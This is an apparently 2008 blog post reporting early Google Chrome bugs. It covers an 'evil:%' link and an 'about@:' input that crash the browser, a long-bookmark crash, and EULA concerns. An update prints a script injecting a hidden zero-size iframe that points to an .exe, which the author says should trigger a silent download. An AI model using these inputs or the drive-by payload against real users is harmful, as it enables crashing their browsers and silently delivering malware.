Update: 10.09.08: As from today on, due to an update from Chrome the :% issue is no more valid.
Rishi Narang has been the first. A Denial Of Service simple as pie:
Just browse this page and place your mouse over this link (make sure you bookmark this page if you want to read on though):
Just “evil:%” in the anchor text is capable of crashing all the Chrome tabs (despite all the tabs are separated processes).
Someone has also reported that by entering a very long bookmark may kill the browser. Length has not been given but it’s worth a try.
If your Chrome is still alive you may want to try entering
about@:
in the location bar.
Good thing is that the browser doesn’t need Administrator rights to run.
Matt Cutt from his blog has stated that the chapter 11 of Eula will be updated. Yes the chapter about you giving all the rights to Google:
a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.
I’m worried about the enthusiastic reviews I see online.
Google brand was enough to push an unfinished product up to make it 1% of the User-Agent’s used on its very first day.
The risk is high, fuzzers are still crunching…
Update:
Another Bug found.
< script > document.write(’< iframe src=”http://www.example.com/hello.exe” frameborder=”0″ width=”0″ height=”0″ >’); < / script >
This script should (I haven’t tested it yet, will do it later) trigger a silent download on the client machine.
Related articles around the web:
![Reblog this post [with Zemanta]](http://img.zemanta.com/reblog_e.png?x-id=736ad25f-6bf2-47b6-b9b2-3dfe6e9ce947)
